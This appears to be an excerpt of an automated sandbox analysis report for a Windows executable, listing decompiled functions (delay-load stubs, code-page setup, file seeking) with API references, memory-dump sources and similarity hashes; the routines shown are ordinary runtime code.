                Function 003EE2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 3d5e6305c4d61018462a36fa286e218911b3dda94a81745e5080af67e1fac1cf
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: 3d5e6305c4d61018462a36fa286e218911b3dda94a81745e5080af67e1fac1cf
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: f3af972561aa4a7fd253cd97ae730e20b155220b6ef1a3e8a9f1ae59e8d4da26
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: f3af972561aa4a7fd253cd97ae730e20b155220b6ef1a3e8a9f1ae59e8d4da26
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE51F
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 2>
                • API String ID: 1269201914-3453434342
                • Opcode ID: 8779a0e4379a6a5908eebbdf0c18e186371f5d71d5653b7463808b319834ed1e
                • Instruction ID: 101e0d79b49d6a19239276ad6175c58418d8948380e582031853b645f2fe1d28
                • Opcode Fuzzy Hash: 8779a0e4379a6a5908eebbdf0c18e186371f5d71d5653b7463808b319834ed1e
                • Instruction Fuzzy Hash: 2BA011CA2A88A2BCB00A22222C02C3B020CC0C2F203308B2EF822888C0A8800C080830
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE51F
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 2>
                • API String ID: 1269201914-3453434342
                • Opcode ID: c1c6da307144c1c87146de519fdbe27e4d7e43b56a4c325b9392130dbeeebf58
                • Instruction ID: 101e0d79b49d6a19239276ad6175c58418d8948380e582031853b645f2fe1d28
                • Opcode Fuzzy Hash: c1c6da307144c1c87146de519fdbe27e4d7e43b56a4c325b9392130dbeeebf58
                • Instruction Fuzzy Hash: 2BA011CA2A88A2BCB00A22222C02C3B020CC0C2F203308B2EF822888C0A8800C080830
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE51F
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 2>
                • API String ID: 1269201914-3453434342
                • Opcode ID: 22b4bd241f089d8b289b4f8d78c2a4ffee7919a2f5b5c881b2afdcbedcba53b0
                • Instruction ID: 101e0d79b49d6a19239276ad6175c58418d8948380e582031853b645f2fe1d28
                • Opcode Fuzzy Hash: 22b4bd241f089d8b289b4f8d78c2a4ffee7919a2f5b5c881b2afdcbedcba53b0
                • Instruction Fuzzy Hash: 2BA011CA2A88A2BCB00A22222C02C3B020CC0C2F203308B2EF822888C0A8800C080830
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE51F
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 2>
                • API String ID: 1269201914-3453434342
                • Opcode ID: 984f2c0682c1b3d40f03a2498c6c85e1a1694aac9d4cfb4b995ecf429b67d498
                • Instruction ID: 101e0d79b49d6a19239276ad6175c58418d8948380e582031853b645f2fe1d28
                • Opcode Fuzzy Hash: 984f2c0682c1b3d40f03a2498c6c85e1a1694aac9d4cfb4b995ecf429b67d498
                • Instruction Fuzzy Hash: 2BA011CA2A88A2BCB00A22222C02C3B020CC0C2F203308B2EF822888C0A8800C080830
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E003FBBF0(void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __esi;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed int _t60;
				signed char _t62;
				signed int _t63;
				signed char* _t71;
				signed char* _t72;
				int _t75;
				signed int _t78;
				signed char* _t79;
				short* _t80;
				int _t84;
				signed char _t85;
				signed int _t86;
				signed int _t89;
				signed int _t90;
				int _t92;
				int _t93;
				intOrPtr _t95;
				signed int _t96;

				_t91 = __edi;
				_t48 =  *0x40e7ac; // 0xc24f6281
				_v8 = _t48 ^ _t96;
				_t95 = _a8;
				_t75 = E003FB7BB(__eflags, _a4);
				if(_t75 != 0) {
					_push(__edi);
					_t92 = 0;
					__eflags = 0;
					_t78 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x40e978)) - _t75;
						if( *((intOrPtr*)(_t51 + 0x40e978)) == _t75) {
							break;
						}
						_t78 = _t78 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t78;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t75 - 0xfde8;
							if(_t75 == 0xfde8) {
								L23:
								_t60 = _t51 | 0xffffffff;
							} else {
								__eflags = _t75 - 0xfde9;
								if(_t75 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t75 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t75,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0x4326c4 - _t92; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E003FB82E(_t95);
												goto L37;
											}
										} else {
											E003EFFF0(_t92, _t95 + 0x18, _t92, 0x101);
											 *(_t95 + 4) = _t75;
											 *(_t95 + 0x21c) = _t92;
											_t75 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t95 + 8) = _t92;
											} else {
												__eflags = _v22;
												_t71 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t85 = _t71[1];
														__eflags = _t85;
														if(_t85 == 0) {
															goto L16;
														}
														_t89 = _t85 & 0x000000ff;
														_t86 =  *_t71 & 0x000000ff;
														while(1) {
															__eflags = _t86 - _t89;
															if(_t86 > _t89) {
																break;
															}
															 *(_t95 + _t86 + 0x19) =  *(_t95 + _t86 + 0x19) | 0x00000004;
															_t86 = _t86 + 1;
															__eflags = _t86;
														}
														_t71 =  &(_t71[2]);
														__eflags =  *_t71;
														if( *_t71 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t72 = _t95 + 0x1a;
												_t84 = 0xfe;
												do {
													 *_t72 =  *_t72 | 0x00000008;
													_t72 =  &(_t72[1]);
													_t84 = _t84 - 1;
													__eflags = _t84;
												} while (_t84 != 0);
												 *(_t95 + 0x21c) = E003FB77D( *(_t95 + 4));
												 *(_t95 + 8) = _t75;
											}
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E003FB893(_t89, _t95); // executed
											L37:
											_t60 = 0;
											__eflags = 0;
										}
									}
								}
							}
						}
						_pop(_t91);
						goto L39;
					}
					E003EFFF0(_t92, _t95 + 0x18, _t92, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x40e988;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t79 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t79[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t90 =  *_t79 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t90 - _t63;
									if(_t90 > _t63) {
										break;
									}
									__eflags = _t90 - 0x100;
									if(_t90 < 0x100) {
										_t31 = _t92 + 0x40e970; // 0x8040201
										 *(_t95 + _t90 + 0x19) =  *(_t95 + _t90 + 0x19) |  *_t31;
										_t90 = _t90 + 1;
										__eflags = _t90;
										_t63 = _t79[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t79 =  &(_t79[2]);
								__eflags =  *_t79;
								if( *_t79 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t92 = _t92 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t95 + 4) = _t75;
					 *(_t95 + 8) = 1;
					 *(_t95 + 0x21c) = E003FB77D(_t75);
					_t80 = _t95 + 0xc;
					_t89 = _v36 + 0x40e97c;
					_t93 = 6;
					do {
						_t58 =  *_t89;
						_t89 = _t89 + 2;
						 *_t80 = _t58;
						_t80 = _t80 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L36;
				} else {
					E003FB82E(_t95);
					_t60 = 0;
				}
				L39:
				return E003EFBBC(_t60, _t75, _v8 ^ _t96, _t89, _t91, _t95);
			}

































                0x003fbbf0
                0x003fbbf8
                0x003fbbff
                0x003fbc07
                0x003fbc0f
                0x003fbc14
                0x003fbc24
                0x003fbc25
                0x003fbc25
                0x003fbc27
                0x003fbc29
                0x003fbc2b
                0x003fbc2e
                0x003fbc2e
                0x003fbc34
                0x00000000
                0x00000000
                0x003fbc3a
                0x003fbc3b
                0x003fbc3e
                0x003fbc41
                0x003fbc46
                0x00000000
                0x003fbc48
                0x003fbc48
                0x003fbc4e
                0x003fbd1c
                0x003fbd1c
                0x003fbc54
                0x003fbc54
                0x003fbc5a
                0x00000000
                0x003fbc60
                0x003fbc64
                0x003fbc6a
                0x003fbc6c
                0x00000000
                0x003fbc72
                0x003fbc77
                0x003fbc7d
                0x003fbc7f
                0x003fbd09
                0x003fbd0f
                0x00000000
                0x003fbd11
                0x003fbd12
                0x00000000
                0x003fbd12
                0x003fbc85
                0x003fbc8f
                0x003fbc94
                0x003fbc9c
                0x003fbca2
                0x003fbca3
                0x003fbca6
                0x003fbcf9
                0x003fbca8
                0x003fbca8
                0x003fbcac
                0x003fbcaf
                0x003fbcb1
                0x003fbcb1
                0x003fbcb4
                0x003fbcb6
                0x00000000
                0x00000000
                0x003fbcb8
                0x003fbcbb
                0x003fbcc6
                0x003fbcc6
                0x003fbcc8
                0x00000000
                0x00000000
                0x003fbcc0
                0x003fbcc5
                0x003fbcc5
                0x003fbcc5
                0x003fbcca
                0x003fbccd
                0x003fbcd0
                0x00000000
                0x00000000
                0x00000000
                0x003fbcd0
                0x003fbcb1
                0x003fbcd2
                0x003fbcd2
                0x003fbcd5
                0x003fbcda
                0x003fbcda
                0x003fbcdd
                0x003fbcde
                0x003fbcde
                0x003fbcde
                0x003fbcee
                0x003fbcf4
                0x003fbcf4
                0x003fbd01
                0x003fbd02
                0x003fbd03
                0x003fbdc7
                0x003fbdc8
                0x003fbdcd
                0x003fbdce
                0x003fbdce
                0x003fbdce
                0x003fbc7f
                0x003fbc6c
                0x003fbc5a
                0x003fbc4e
                0x003fbdd0
                0x00000000
                0x003fbdd0
                0x003fbd2e
                0x003fbd36
                0x003fbd36
                0x003fbd3a
                0x003fbd3d
                0x003fbd43
                0x003fbd46
                0x003fbd46
                0x003fbd49
                0x003fbd4b
                0x003fbd4d
                0x003fbd4d
                0x003fbd50
                0x003fbd52
                0x00000000
                0x00000000
                0x003fbd54
                0x003fbd57
                0x003fbd73
                0x003fbd73
                0x003fbd75
                0x00000000
                0x00000000
                0x003fbd5c
                0x003fbd62
                0x003fbd64
                0x003fbd6a
                0x003fbd6e
                0x003fbd6e
                0x003fbd6f
                0x00000000
                0x003fbd6f
                0x00000000
                0x003fbd62
                0x003fbd77
                0x003fbd7a
                0x003fbd7d
                0x00000000
                0x00000000
                0x00000000
                0x003fbd7d
                0x003fbd7f
                0x003fbd7f
                0x003fbd82
                0x003fbd83
                0x003fbd86
                0x003fbd89
                0x003fbd89
                0x003fbd8f
                0x003fbd92
                0x003fbda1
                0x003fbdaa
                0x003fbdaf
                0x003fbdb5
                0x003fbdb6
                0x003fbdb6
                0x003fbdb9
                0x003fbdbc
                0x003fbdbf
                0x003fbdc2
                0x003fbdc2
                0x003fbdc2
                0x00000000
                0x003fbc16
                0x003fbc17
                0x003fbc1d
                0x003fbc1d
                0x003fbdd1
                0x003fbde0

                APIs
                  • Part of subcall function 003FB7BB: GetOEMCP.KERNEL32(00000000,?,?,003FBA44,?), ref: 003FB7E6
                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,003FBA89,?,00000000), ref: 003FBC64
                • GetCPInfo.KERNEL32(00000000,003FBA89,?,?,?,003FBA89,?,00000000), ref: 003FBC77
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CodeInfoPageValid
                • String ID:
                • API String ID: 546120528-0
                • Opcode ID: 3c1e94db903940de0de51f2939e3c8d0094b6a8e67061bda6c9019f8b7ebad2c
                • Instruction ID: 85c35da60d7cd4dc0a9f5bd42aa9a8b26721c9d924b78ee2efa932f0e926bedd
                • Opcode Fuzzy Hash: 3c1e94db903940de0de51f2939e3c8d0094b6a8e67061bda6c9019f8b7ebad2c
                • Instruction Fuzzy Hash: C85147F0A0024D9FDB22DF75C8816BBFBE8EF41300F28446EE6968B651D7359945CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                Download Yara Rule
                C-Code - Quality: 60%
                			E003D9A74(signed int __ecx, long* _a4, signed int _a8, long _a12, signed int _a20, char _a24, long _a4124, long _a4128, long _a4132) {
				signed int _v0;
				long* _v4;
				intOrPtr _v8;
				void* _t30;
				long _t32;
				signed int _t33;
				void* _t35;
				long* _t38;
				void* _t41;
				long _t42;
				signed int _t46;
				long _t50;
				void* _t51;
				long _t52;
				intOrPtr* _t53;
				void* _t57;
				void* _t63;
				signed int _t67;
				signed int _t70;

				E003EEC50(0x1018);
				_t50 = _a4132;
				_t42 = _a4128;
				_t53 = __ecx;
				_t52 = _a4124;
				_v0 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0xffffffff) {
					L21:
					_t30 = 1;
					L22:
					return _t30;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) != 1) {
					__eflags = _t42;
					if(__eflags > 0) {
						L32:
						_a12 = _t42;
						_t32 = SetFilePointer( *(_t53 + 8), _t52,  &_a12, _t50); // executed
						__eflags = _t32 - 0xffffffff;
						if(_t32 != 0xffffffff) {
							goto L21;
						}
						_t33 = GetLastError();
						asm("sbb al, al");
						_t30 =  ~_t33 + 1;
						goto L22;
					}
					if(__eflags < 0) {
						L27:
						__eflags = _t50;
						if(_t50 == 0) {
							goto L32;
						}
						__eflags = _t50 - 1;
						if(_t50 != 1) {
							_t35 = E003D981A(_t50);
						} else {
							 *0x403278();
							_t35 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0x14))))();
							_t53 = _v0;
						}
						_t52 = _t52 + _t35;
						asm("adc ebx, edx");
						_t50 = 0;
						__eflags = 0;
						goto L32;
					}
					__eflags = _t52;
					if(_t52 >= 0) {
						goto L32;
					}
					goto L27;
				}
				_t38 = __ecx + 0x28;
				_a4 = _t38;
				if(_t50 != 1) {
					__eflags = _t50;
					if(_t50 != 0) {
						L23:
						_t30 = 0;
						goto L22;
					}
					L5:
					_t63 = _t42 - _t38[1];
					if(_t63 < 0 || _t63 <= 0 && _t52 <  *_t38) {
						goto L23;
					} else {
						_t46 = _t42;
						_t57 = _t52 -  *_t38;
						asm("sbb ecx, [eax+0x4]");
						_a8 = _t46;
						if(_t57 != 0 || _t57 != 0) {
							do {
								_t67 = _t46;
								if(_t67 > 0 || _t67 >= 0 && _t57 >= 0x1000) {
									L14:
									_t12 =  &_a20;
									 *_t12 = _a20 & 0x00000000;
									__eflags =  *_t12;
									_t51 = 0x1000;
									goto L15;
								} else {
									_t51 = _t57;
									_a20 = _t46;
									L15:
									 *0x403278( &_a24, _t51);
									_t41 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0xc))))();
									if(_t41 <= 0) {
										goto L23;
									}
									_t46 = _v0;
									_t53 = _v8;
									asm("cdq");
									_t57 = _t57 - _t41;
									asm("sbb ecx, edx");
									_v0 = _t46;
									_t70 = _t46;
									if(_t70 > 0) {
										goto L14;
									}
								}
							} while (_t70 >= 0 && _t57 != 0);
							_t38 = _v4;
							goto L20;
						} else {
							L20:
							 *_t38 = _t52;
							_t38[1] = _t42;
							goto L21;
						}
					}
				}
				_t52 = _t52 +  *_t38;
				asm("adc ebx, [eax+0x4]");
				goto L5;
			}






















                0x003d9a79
                0x003d9a7e
                0x003d9a86
                0x003d9a8f
                0x003d9a92
                0x003d9a99
                0x003d9aa1
                0x003d9b53
                0x003d9b53
                0x003d9b59
                0x003d9b5f
                0x003d9b5f
                0x003d9aab
                0x003d9b66
                0x003d9b68
                0x003d9b9d
                0x003d9ba2
                0x003d9bab
                0x003d9bb1
                0x003d9bb4
                0x00000000
                0x00000000
                0x003d9bb6
                0x003d9bbe
                0x003d9bc0
                0x00000000
                0x003d9bc0
                0x003d9b6a
                0x003d9b70
                0x003d9b70
                0x003d9b72
                0x00000000
                0x00000000
                0x003d9b74
                0x003d9b77
                0x003d9b92
                0x003d9b79
                0x003d9b80
                0x003d9b8a
                0x003d9b8c
                0x003d9b8c
                0x003d9b97
                0x003d9b99
                0x003d9b9b
                0x003d9b9b
                0x00000000
                0x003d9b9b
                0x003d9b6c
                0x003d9b6e
                0x00000000
                0x00000000
                0x00000000
                0x003d9b6e
                0x003d9ab1
                0x003d9ab4
                0x003d9abb
                0x003d9ac4
                0x003d9ac6
                0x003d9b62
                0x003d9b62
                0x00000000
                0x003d9b62
                0x003d9acc
                0x003d9acc
                0x003d9acf
                0x00000000
                0x003d9adf
                0x003d9ae1
                0x003d9ae3
                0x003d9ae5
                0x003d9ae8
                0x003d9aec
                0x003d9af2
                0x003d9af2
                0x003d9af4
                0x003d9b08
                0x003d9b08
                0x003d9b08
                0x003d9b08
                0x003d9b0d
                0x00000000
                0x003d9b00
                0x003d9b00
                0x003d9b02
                0x003d9b12
                0x003d9b1f
                0x003d9b29
                0x003d9b2d
                0x00000000
                0x00000000
                0x003d9b2f
                0x003d9b33
                0x003d9b37
                0x003d9b38
                0x003d9b3a
                0x003d9b3c
                0x003d9b40
                0x003d9b42
                0x00000000
                0x00000000
                0x003d9b42
                0x003d9b44
                0x003d9b4a
                0x00000000
                0x003d9b4e
                0x003d9b4e
                0x003d9b4e
                0x003d9b50
                0x00000000
                0x003d9b50
                0x003d9aec
                0x003d9acf
                0x003d9abd
                0x003d9abf
                0x00000000

                APIs
                • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,003D9A50,?,?,00000000,?,?,003D8CBC,?), ref: 003D9BAB
                • GetLastError.KERNEL32(?,00000000,003D8411,-00009570,00000000,000007F3), ref: 003D9BB6
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: 3d3f1dded7802d0bf86281971cf62740e497b7ca55ba1298e5a237dbf3991d7c
                • Instruction ID: 9454a1291b9f12ab29e106ab780136fcb5aaa4bb214f1de824f459a53f4f7e7a
                • Opcode Fuzzy Hash: 3d3f1dded7802d0bf86281971cf62740e497b7ca55ba1298e5a237dbf3991d7c
                • Instruction Fuzzy Hash: 3641CC726043018BDB269F29F584A6AB7E9FBD5320F178A2FE88587360D770AC448A51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E003D1E50(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t38;
				intOrPtr _t47;
				void* _t68;
				unsigned int _t70;
				signed int _t72;
				intOrPtr* _t74;
				void* _t76;

				_t68 = __edx;
				E003EEB78(0x402673, _t76);
				_t55 = 0;
				 *((intOrPtr*)(_t76 - 0x10)) = __ecx;
				 *((intOrPtr*)(_t76 - 0x24)) = 0;
				 *(_t76 - 0x20) = 0;
				 *((intOrPtr*)(_t76 - 0x1c)) = 0;
				 *((intOrPtr*)(_t76 - 0x18)) = 0;
				 *((char*)(_t76 - 0x14)) = 0;
				_push(0);
